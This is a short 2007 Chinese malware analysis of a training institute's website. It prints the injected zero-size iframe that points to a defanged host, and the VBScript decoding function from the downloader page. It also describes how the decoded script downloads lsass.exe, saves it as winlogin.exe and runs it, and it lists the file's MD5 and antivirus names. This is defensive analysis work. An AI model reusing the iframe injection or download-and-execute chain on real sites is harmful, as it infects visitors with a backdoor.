某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码

endurer 原创
2007-05-11 第1版

该网站页面被植入代码：
/---
＜iframe src=hxxp://web**.5***9*cn.cn/n*a***p*ole*on/windows**/index.htm width=0 height=0＞＜/iframe＞
---/

hxxp://web**.5***9*cn.cn/n*a***p*ole*on/windows**/index.htm（Kaspersky报为：Trojan-Downloader.VBS.Psyme.de）的内容为vbscript脚本，功能是利用自定义函数
/---
function UnEncode（temp）
but＝67
for i ＝ 1 to len（temp）
    if mid（temp，i，1）＜＞ "琳" then
If Asc（Mid（temp， i， 1）） ＜ 32 Or Asc（Mid（temp， i， 1）） ＞ 126 Then
a ＝ a ＆ Chr（Asc（Mid（temp， i， 1）））
else
pk＝asc（mid（temp，i，1））-but
            if pk＞126 then
                    pk＝pk-95
            elseif pk＜32 then
                     pk＝pk＋95
             end if
             a＝a＆chr（pk）
end if
   else
             a＝a＆vbcrlf
   end if
next
UnEncode＝a
end function
---/
解密并输出变量hu的值。

变量hu的值解密输出的是一段vbscript脚本，功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 lsass.exe，保存为%temp%/winlogin.exe，然后通过 Shell.Application 对象 Q 的 ShellExecute 方法运行。

文件说明符 : D:/test/lsass.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 21:11:27
修改时间 : 2007-5-10 21:11:28
访问时间 : 2007-5-10 0:0:0
大小 : 309760 字节 302.512 KB
MD5 : f71f70cef3c5f71059f042516390262d

瑞星报为 Backdoor.Gpigeon.GEN